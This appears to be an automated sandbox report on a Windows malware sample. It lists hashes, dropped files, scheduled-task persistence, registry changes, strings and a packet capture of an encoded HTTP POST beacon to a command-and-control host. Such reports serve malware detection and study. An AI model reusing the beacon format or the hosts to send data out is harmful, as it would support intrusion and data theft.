Analysis Date: 2014-10-06 07:55:12
MD5: 034b76acccfe6cf7124b814735182991
SHA1: 62d0b0b3344472bda25b9920747be1998f38bd0a

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section CODE md5: fcb2d27e2424170b597f67d43d30d3ef sha1: a7f911cfbcc3144d88ee0d7ed3dd8046ead60ffe size: 14848
Section DATA md5: e781d687eb43e070fe5e0069b9d93498 sha1: d8948f3fc9e2071e093b26ce36a98198de4e1780 size: 142848
Section BSS md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section .idata md5: 54ffa307db20bd448119507254ab13e6 sha1: c1fcfe734c5687313bbd942f3a11fe7aa1dbb266 size: 3072
Section .reloc md5: 8b59b928391e05d8198fb7f94a4bdd27 sha1: 12b1560795385c7e54de2d263203d3834d6415b4 size: 1024
Section .rsrc md5: 4439c3a4a132c10209cc66afe16918ea sha1: f0e92495d9513406dca96f39209a30dcd9b6acb0 size: 1024
Timestamp: 1992-06-19 22:22:17 (this fixed value, together with the CODE/DATA/BSS section layout, is typical of Borland Delphi-built binaries and should not be read as the real build time)
PEhash: 9595ca0c2b8b8c81bca5abd76bd3dde1c6a6223c
IMPhash: c026b969030c0f9a87fb6d5cce0ff1c3

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates File: C:\WINDOWS\Ojawia.exe
Creates File: C:\WINDOWS\Tasks\{810401E2-DDE0-454e-B0E2-AA89C9E5967C}.job
Creates File: PIPE\lsarpc
Creates Process: C:\WINDOWS\Ojawia.exe
Creates Mutex: Global\{BC9BACEF-649A-45ff-A468-C000D051F283}

Process
↳ C:\WINDOWS\Ojawia.exe

Registry: HKEY_CURRENT_USER\Software\K8CE6CA1JO\OhuD ➝ 5
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝ NULL
Creates File: C:\WINDOWS\Tasks\{810401E2-DDE0-454e-B0E2-AA89C9E5967C}.job
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes File: C:\WINDOWS\Tasks\{810401E2-DDE0-454e-B0E2-AA89C9E5967C}.job
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: Global\{BC9BACEF-649A-45ff-A468-C000D051F283}

Network Details:

DNS: ning.com
Type: A
208.82.16.81
DNS: kaskus.us
Type: A
192.31.186.4
DNS: fqplus.com
Type: A
184.168.192.6
DNS: tesyeux.com
Type: A
DNS: iufaculty.com
Type: A
HTTP POST: http://fqplus.com/1wave.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP: 192.168.1.1:1031 ➝ 184.168.192.6:80

Raw Pcap
0x00000000 (00000)   504f5354 202f3177 6176652e 70687020   POST /1wave.php 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a43 6f6e7465 6e742d54   : */*..Content-T
0x00000030 (00048)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000040 (00064)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000050 (00080)   6e636f64 65640d0a 486f7374 3a206671   ncoded..Host: fq
0x00000060 (00096)   706c7573 2e636f6d 0d0a5573 65722d41   plus.com..User-A
0x00000070 (00112)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000080 (00128)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000090 (00144)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x000000a0 (00160)   204e5420 352e3029 0d0a436f 6e74656e    NT 5.0)..Conten
0x000000b0 (00176)   742d4c65 6e677468 3a203330 350d0a43   t-Length: 305..C
0x000000c0 (00192)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x000000d0 (00208)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000e0 (00224)   206e6f2d 63616368 650d0a0d 0a646174    no-cache....dat
0x000000f0 (00240)   613d652f 65367235 4a5a5231 30466977   a=e/e6r5JZR10Fiw
0x00000100 (00256)   6f474c67 35315167 4339686e 6245786f   oGLg51QgC9hnbExo
0x00000110 (00272)   32316174 33614f59 6773552f 484c6b7a   21at3aOYgsU/HLkz
0x00000120 (00288)   66336375 77704474 52737935 2b65305a   f3cuwpDtRsy5+e0Z
0x00000130 (00304)   5a523733 6c455878 7a38547a 5a663678   ZR73lEXxz8TzZf6x
0x00000140 (00320)   33306564 63736477 4d4a4f64 41462f56   30edcsdwMJOdAF/V
0x00000150 (00336)   6a567357 48463045 79377a44 4a57392f   jVsWHF0Ey7zDJW9/
0x00000160 (00352)   73394a45 724a3070 66723832 51593662   s9JErJ0pfr82QY6b
0x00000170 (00368)   38484367 53754e61 55716967 346f5633   8HCgSuNaUqig4oV3
0x00000180 (00384)   4242774b 3274327a 37335247 65795544   BBwK2t2z73RGeyUD
0x00000190 (00400)   6a677375 48467043 4c4f696b 5250534c   jgsuHFpCLOikRPSL
0x000001a0 (00416)   39536a75 50314942 38624b70 6a746d4a   9SjuP1IB8bKpjtmJ
0x000001b0 (00432)   30696733 566d5663 4638616f 4f724252   0ig3VmVcF8aoOrBR
0x000001c0 (00448)   52437964 624b5067 4f69452f 6b7a6a67   RCydbKPgOiE/kzjg
0x000001d0 (00464)   4d764145 436d5643 62664b72 4e653657   MvAECmVCbfKrNe6W
0x000001e0 (00480)   6c486768 6b45546a 2f6b4776 38463630   lHghkETj/kGv8F60
0x000001f0 (00496)   5552444d 50686e34 70644941 44714678   URDMPhn4pdIADqFx
0x00000200 (00512)   42482f34 66663845 72776a6c 32555977   BH/4ff8Erwjl2UYw
0x00000210 (00528)   536c6572 34444378 3431415a 3450       Sler4DCx41AZ4P


Strings
v.
\
.6AU!9a&w
..ir...S..=..&..
XT
x.^D.+V..I
7:9
...
p...U.
...

0+t"
1>}=
1D_d
2z0v
3Dm/
*4>D
4iFU@i
5@^f[p?
~6'a
'8O/
A`Fo
\]aNr
Axq_6
"^b3
Et:#
~<eW
}H~\
I)3Z
>J<E
!.jg
k^NV
k}VfN
lMp@
&=lR]
NA&4
O)_8
OmQ2
o,>oI
(PK8
>Q32
ss`R
TG{'
TmqT
'UpO
~w'B
WWFg
x4#$
/@YH
|z.0
*Z@t
12d9a3ea
2"2*222:2B2J2R2Z2b2j2r2z2
3%3+31373=3C3I3O3U3[3a3g3m3s3y3
3&3.363>3F3N3V3^3f3n3v3~3
4!4'4-43494?4E4K4Q4W4]4c4i4o4u4{4
4&4.464>4F4N4V4^4f4n4v4~4
9&9-949<9C9X9,:3:{<
9F<P<q=
9+q;1A
AppCompat_RunDLLW
  </application> 
  <application> 
AQj,s?
</assembly>
   <assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Windows Setup UAC" type="win32"/>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 
B4:u(y
@BJ;m,w	
CallNamedPipeA
ChildWindowFromPoint
ChooseFontA
CoCreateFreeThreadedMarshaler
CoGetTreatAsClass
CoInitialize
comdlg32.dll
CommDlgExtendedError
CommitSpoolData
CompareFileTime
</compatibility> 
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> 
CopyFileExA
CopyFileExW
CoQueryReleaseObject
CreateHardLinkW
CreateWindowExA
DefFrameProcW
DeletePrintProvidorW
DestroyCaret
DEVICECAPABILITIES
DevQueryPrintEx
DllGetVersion
DragQueryFileW
Em*3)E
EqualRect
EXTDEVICEMODE
FlushConsoleInputBuffer
freeaddrinfo
GetClassWord
GetEnvironmentVariableA
GetFileTitleW
GetHGlobalFromILockBytes
GetOpenFileNameA
GetOpenFileNameW
GetProcAddress
GetSaveFileNameW
GetSystemDefaultLCID
GetWindowTextA
GetWindowThreadProcessId
Gjl(V.
ICJI9-
.idata
InflateRect
InternalExtractIconListW
IntersectRect
IsValidInterface
kernel32.dll
KKGJ;E
LoadLibraryA
LoadLibraryExA
LocalAlloc
LocalFree
'{m+,,,
M0W0`0f0l0
OffsetRect
ole32.dll
OleCreateLinkFromData
OleDuplicateData
OleIsCurrentClipboard
OpenAs_RunDLL
Options_RunDLLA
PageSetupDlgW
PathAddBackslashA
PathCanonicalizeW
PathCompactPathExA
PathFindFileNameW
PathFindOnPathW
PathIsSameRootA
PrintDlgExA
PrintDlgW
:\}p rnW
P.rsrc
PtInRect
`q`-I	
Qt,ZD-
RealShellExecuteW
regapi
.reloc
ReplaceTextW
            <requestedExecutionLevel level="highestAvailable"/> 
         </requestedPrivileges>
         <requestedPrivileges>
      </security>
      <security>
SetLocaleInfoW
SetPortA
SetWindowTextA
SHBrowseForFolder
SHBrowseForFolderW
SHChangeNotifySuspendResume
SHCreateLocalServerRunDll
shell32.dll
SHFreeNameMappings
SHGetSpecialFolderPathA
SHGetThreadRef
SHInvokePrinterCommandW
shlwapi.dll
SHOpenRegStreamA
SHPathPrepareForWriteA
SHRegGetPathW
SHRegQueryInfoUSKeyW
SHStrDupA
StrCatBuffA
StrCmpNW
StrCpyW
StringX
StrRChrIA
StrRStrIA
StrStrNW
      <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/> 
      <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/> 
?(?S?Z?o?
)=t,,,
{+t|cc
    <!--The ID below indicates application support for Windows 7 --> 
    <!--The ID below indicates application support for Windows Vista --> 
This program must be run under Win32
   </trustInfo>
      <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
UnionRect
UrlApplySchemeA
UrlCreateFromPathA
user32.dll
VirtualAllocEx
VirtualFree
VirtualProtect
WantArrows
WindowFromPoint
winspool.drv
WriteFileEx
ws2_32.dll
WSAAddressToStringW
WSAEnumProtocolsW
WSAInstallServiceClassA
WSAJoinLeaf
WSANtohs
WSASendDisconnect
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
Y+jKr	;